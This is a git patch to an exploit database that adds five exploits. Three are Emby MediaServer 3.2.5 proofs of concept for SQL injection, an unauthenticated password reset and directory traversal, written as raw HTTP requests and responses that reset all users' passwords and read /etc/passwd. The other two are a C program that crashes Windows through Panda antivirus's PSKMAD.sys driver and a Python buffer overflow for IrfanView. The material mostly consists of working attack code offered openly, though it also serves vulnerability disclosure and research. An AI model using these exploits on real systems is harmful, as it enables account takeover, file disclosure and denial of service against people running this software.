From e4147fb21ea68ad96022ff768073b61e94ba0ae9 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 1 May 2017 05:01:18 +0000 Subject: [PATCH] DB: 2017-05-01 5 new exploits Panda Free Antivirus - 'PSKMAD.sys' Denial of Service IrfanView 4.44 - Denial of Service Emby MediaServer 3.2.5 - SQL Injection Emby MediaServer 3.2.5 - Password Reset Emby MediaServer 3.2.5 - Directory Traversal --- files.csv | 5 + platforms/multiple/webapps/41946.txt | 66 +++++++++++ platforms/multiple/webapps/41947.txt | 166 +++++++++++++++++++++++++++ platforms/multiple/webapps/41948.txt | 157 +++++++++++++++++++++++++ platforms/windows/dos/41945.c | 89 ++++++++++++++ platforms/windows/dos/41949.py | 30 +++++ 6 files changed, 513 insertions(+) create mode 100755 platforms/multiple/webapps/41946.txt create mode 100755 platforms/multiple/webapps/41947.txt create mode 100755 platforms/multiple/webapps/41948.txt create mode 100755 platforms/windows/dos/41945.c create mode 100755 platforms/windows/dos/41949.py diff --git a/files.csv b/files.csv index cc2ae02c5..4ae3b17d3 100644 --- a/files.csv +++ b/files.csv @@ -5479,6 +5479,8 @@ id,file,description,date,author,platform,type,port 41931,platforms/multiple/dos/41931.html,"Apple Safari - Array concat Memory Corruption",2017-04-25,"Google Security Research",multiple,dos,0 41932,platforms/multiple/dos/41932.cpp,"Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Double-Free",2017-04-25,"Google Security Research",multiple,dos,0 41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0 +41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0 +41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -37794,3 +37796,6 @@ id,file,description,date,author,platform,type,port 41940,platforms/php/webapps/41940.py,"TYPO3 News Module - SQL Injection",2017-04-27,"Charles Fol",php,webapps,80 41943,platforms/php/webapps/41943.py,"Simple File Uploader - Arbitrary File Download",2017-04-27,"Daniel Godoy",php,webapps,0 41944,platforms/php/webapps/41944.txt,"Easy File Uploader - Arbitrary File Upload",2017-04-27,"Daniel Godoy",php,webapps,0 +41946,platforms/multiple/webapps/41946.txt,"Emby MediaServer 3.2.5 - SQL Injection",2017-04-30,LiquidWorm,multiple,webapps,0 +41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0 +41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0 diff --git a/platforms/multiple/webapps/41946.txt b/platforms/multiple/webapps/41946.txt new file mode 100755 index 000000000..44eeb0178 --- /dev/null +++ b/platforms/multiple/webapps/41946.txt @@ -0,0 +1,66 @@ +Emby MediaServer 3.2.5 Boolean-based Blind SQL Injection Vulnerability + + +Vendor: Emby LLC +Product web page: https://www.emby.media +Affected version: 3.2.5 + 3.1.5 + 3.1.2 + 3.1.1 + 3.1.0 + 3.0.0 + +Summary: Emby (formerly Media Browser) is a media server designed to organize, +play, and stream audio and video to a variety of devices. Emby is open-source, +and uses a client-server model. Two comparable media servers are Plex and Windows +Media Center. + +Desc: Emby suffers from a blind SQL injection vulnerability. Input passed via the GET +parameter 'MediaTypes' is not properly sanitised before being returned to the user +or used in SQL queries. This can be exploited to manipulate SQL queries by injecting +arbitrary SQL code. + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 + Ubuntu Linux 14.04.5 + MacOS Sierra 10.12.3 + SQLite3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5400 +Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5400.php + +SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098 + + +22.12.2016 + +-- + + +PoC: + +GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1 +Host: 10.211.55.3:8096 +accept: application/json +x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 +x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12" +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Connection: close + +Response: + +HTTP/1.1 500 Internal Server Error +Content-Type: text/html +Server: Mono-HTTPAPI/1.0 +Date: Tue, 21 Feb 2017 12:06:09 GMT +Content-Length: 64 +Connection: close + +Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown. diff --git a/platforms/multiple/webapps/41947.txt b/platforms/multiple/webapps/41947.txt new file mode 100755 index 000000000..18cdf66ae --- /dev/null +++ b/platforms/multiple/webapps/41947.txt @@ -0,0 +1,166 @@ +Emby MediaServer 3.2.5 Password Reset Vulnerability + + +Vendor: Emby LLC +Product web page: https://www.emby.media +Affected version: 3.2.5 + 3.1.5 + 3.1.2 + 3.1.1 + 3.1.0 + 3.0.0 + +Summary: Emby (formerly Media Browser) is a media server designed to organize, +play, and stream audio and video to a variety of devices. Emby is open-source, +and uses a client-server model. Two comparable media servers are Plex and Windows +Media Center. + +Desc: The issue can be triggered by an unauthenticated actor within the home network +(LAN) only. The attacker doesn't need to specify a valid username to reset the +password. He or she can enter a random string, and using the file disclosure issue +it's possible to read the PIN needed for resetting. This in turn will disclose all +the valid usernames in the emby server and reset all the passwords for all the users +with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized +access to the emby media server management interface. + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 + Ubuntu Linux 14.04.5 + MacOS Sierra 10.12.3 + SQLite3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5401 +Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php + +SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098 + + +22.12.2016 + +-- + + +1. First we initiate the Forgot Password feature from within our home network: +------------------------------------------------------------------------------ + +http://10.211.55.3:8096/web/forgotpassword.html + + +2. Then, we type any random username and hit submit: +---------------------------------------------------- + +POST /emby/Users/ForgotPassword HTTP/1.1 +Host: 10.211.55.3:8096 +Connection: keep-alive +Content-Length: 32 +accept: application/json +Origin: http://10.211.55.3:8096 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 +x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0" +content-type: application/x-www-form-urlencoded; charset=UTF-8 +Referer: http://10.211.55.3:8096/web/forgotpassword.html +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +DNT: 1 + +EnteredUsername=RandomusUsuarius + + + +3. You will get an alert message (Windows/Linux): +------------------------------------------------- + +The following file has been created on your server and contains instructions on how to proceed: + +C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt + +-- OR -- + +/var/lib/emby-server/passwordreset.txt + + +4. Exploiting the file disclosure vulnerability (ZSL-2017-5403): +---------------------------------------------------------------- + +GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1 +Host: 10.211.55.3:8096 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, sdch +Accept-Language: en-US,en;q=0.8 +Connection: close + +HTTP/1.1 200 OK +X-UA-Compatible: IE=Edge +Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization +Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS +Access-Control-Allow-Origin: * +Vary: Accept-Encoding +ETag: "c4fd834ac2fc99ff99d74c8e994a8a71" +Cache-Control: public +Expires: -1 +Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 +Content-Type: text/plain +Date: Tue, 28 Feb 2017 12:14:51 GMT +Content-Length: 164 +Connection: close + +Use your web browser to visit: + +http://10.211.55.3:8096/web/forgotpasswordpin.html + +Enter the following pin code: + +6727 + +The pin code will expire at 91 + + + +5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system: +----------------------------------------------------------------------------------------------------------------------------- + +POST /emby/Users/ForgotPassword/Pin HTTP/1.1 +Host: 10.211.55.3:8096 +Connection: keep-alive +Content-Length: 9 +accept: application/json +Origin: http://10.211.55.3:8096 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36 +x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0" +content-type: application/x-www-form-urlencoded; charset=UTF-8 +Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.8,mk;q=0.6 +DNT: 1 + +Pin=6272 + +--- + +We get the message: + +Passwords have been removed for the following users. To login, sign in with a blank password. + +testingus +test321 +beebee +admin +ztefan +lio +miko +dni +embyusertest +joxypoxy +test123 +thricer +teppei +admin2 +delf1na + diff --git a/platforms/multiple/webapps/41948.txt b/platforms/multiple/webapps/41948.txt new file mode 100755 index 000000000..ecf956b43 --- /dev/null +++ b/platforms/multiple/webapps/41948.txt @@ -0,0 +1,157 @@ +Emby MediaServer 3.2.5 Directory Traversal File Disclosure Vulnerability + + +Vendor: Emby LLC +Product web page: https://www.emby.media +Affected version: 3.2.5 + 3.1.5 + 3.1.2 + 3.1.1 + 3.1.0 + 3.0.0 + +Summary: Emby (formerly Media Browser) is a media server designed to organize, +play, and stream audio and video to a variety of devices. Emby is open-source, +and uses a client-server model. Two comparable media servers are Plex and Windows +Media Center. + +Desc: The vulnerability was confirmed on tested platforms depending on the version. +Version 3.1.0 is affecting Linux, Windows and Mac platforms. The 3.2.5 only affects +Windows release. Input passed via the 'swagger-ui' object in SwaggerService.cs is not +properly verified before being used to load resources. This can be exploited to disclose +the contents of arbitrary files via directory traversal attacks. + +================================================================================ +/Emby.Server.Implementations/HttpServer/SwaggerService.cs: +---------------------------------------------------------- + +using MediaBrowser.Controller; +using MediaBrowser.Controller.Net; +using System.IO; +using MediaBrowser.Model.IO; +using MediaBrowser.Model.Services; + +namespace Emby.Server.Implementations.HttpServer +{ + public class SwaggerService : IService, IRequiresRequest + { + private readonly IServerApplicationPaths _appPaths; + private readonly IFileSystem _fileSystem; + + public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory) + { + _appPaths = appPaths; + _fileSystem = fileSystem; + _resultFactory = resultFactory; + } + + /// + /// Gets the specified request. + /// + /// The request. + /// System.Object. + public object Get(GetSwaggerResource request) + { + var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui"); + + var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar)); + + return _resultFactory.GetStaticFileResult(Request, requestedFile).Result; + } + + /// + /// Gets or sets the result factory. + /// + /// The result factory. + private readonly IHttpResultFactory _resultFactory; + + /// + /// Gets or sets the request context. + /// + /// The request context. + public IRequest Request { get; set; } + } +} + +================================================================================ + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 + Ubuntu Linux 14.04.5 + MacOS Sierra 10.12.3 + SQLite3 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2017-5403 +Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5403.php + +SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098 + + +22.12.2016 + +-- + + +GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1 + +HTTP/1.1 200 OK +X-UA-Compatible: IE=Edge +Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization +Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS +Access-Control-Allow-Origin: * +Vary: Accept-Encoding +ETag: "07bec80f76d20d26dd300a855219d321" +Cache-Control: public +Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50 +Content-Type: application/octet-stream +Date: Thu, 22 Dec 2016 10:43:53 GMT +Content-Length: 403 +Connection: close + +; for 16-bit app support +[fonts] +[extensions] +[mci extensions] +[files] +[Mail] +MAPI=1 +[MCI Extensions.BAK] +3g2=MPEGVideo +3gp=MPEGVideo +3gp2=MPEGVideo +3gpp=MPEGVideo +aac=MPEGVideo +adt=MPEGVideo +adts=MPEGVideo +m2t=MPEGVideo +m2ts=MPEGVideo +m2v=MPEGVideo +m4a=MPEGVideo +m4v=MPEGVideo +mod=MPEGVideo +mov=MPEGVideo +mp4=MPEGVideo +mp4v=MPEGVideo +mts=MPEGVideo +ts=MPEGVideo +tts=MPEGVideo + +========================== + +On Linux: + +http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync +... +... diff --git a/platforms/windows/dos/41945.c b/platforms/windows/dos/41945.c new file mode 100755 index 000000000..6c4c18193 --- /dev/null +++ b/platforms/windows/dos/41945.c @@ -0,0 +1,89 @@ +/* +# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service +# Date: 2017-04-29 +# Exploit Author: Peter baris +# Vendor Homepage: http://www.saptech-erp.com.au +# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en +# Version: 18.0 +# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64 +# CVE : requested +*/ + +#include "stdafx.h" +#include +#include +#include + + +#define DEVICE_NAME L"\\\\.\\PSMEMDriver" + +LPCTSTR FileName = (LPCTSTR)DEVICE_NAME; +HANDLE GetDeviceHandle(LPCTSTR FileName) { + HANDLE hFile = NULL; + + hFile = CreateFile(FileName, + GENERIC_READ | GENERIC_WRITE, + 0, + 0, + OPEN_EXISTING, + NULL, + 0); + + return hFile; +} + +int main() +{ + + HANDLE hFile = NULL; + PVOID64 lpInBuffer = NULL; + ULONG64 lpBytesReturned; + PVOID64 BuffAddress = NULL; + SIZE_T BufferSize = 0x800; + + printf("Trying the get the handle for the PSMEMDriver device.\r\n"); + + hFile = GetDeviceHandle(FileName); + + if (hFile == INVALID_HANDLE_VALUE) { + printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError()); + return 1; + } + + // Allocate memory for our buffer + lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE); + + + if (lpInBuffer == NULL) { + printf("VirtualAlloc() failed. \r\n"); + return 1; + } + + + BuffAddress = (PVOID64)(((ULONG64)lpInBuffer)); + *(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag??? + BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4)); + *(PULONG64)BuffAddress = (ULONG64)0x42424242; + BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8)); + + RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41); + + + + DeviceIoControl(hFile, + 0xb3702c38, + lpInBuffer, + NULL, //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory + NULL, + NULL, + &lpBytesReturned, + NULL); + + /*This part is pretty much useless, just wanted to be nice in case the machine survives.*/ + printf("Cleaning up.\r\n"); + VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE); + CloseHandle(hFile); + printf("Resources freed up.\r\n"); + return 0; +} + diff --git a/platforms/windows/dos/41949.py b/platforms/windows/dos/41949.py new file mode 100755 index 000000000..c0009a5b0 --- /dev/null +++ b/platforms/windows/dos/41949.py @@ -0,0 +1,30 @@ +# Exploit Title: Irfanview - OtherExtensions Input Overflow +# Date: 29-04-2017 +# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button +# Exploit Author: Dreivan Orprecio +#Version: Irfanview 4.44 +#Irfanview is vulnerable to overflow in "OtherExtensions" input field +#Debugging Machine: WinXP Pro SP3 (32bit) + + +#POC + +#!usr/bin/python + + + eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll + + + + buffer = "OtherExtensions="+"A" * 199 + eip + "\xcc" + + print buffer #a) irfanview->Option->Properties/Settings->Extensions + #b) Paste the buffer in the "other" input then press ok, repeat a) and b) + + + + + +#badcharacters: those instruction that start with 6,7,8,E,F +#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit +#Any other way around this? \ No newline at end of file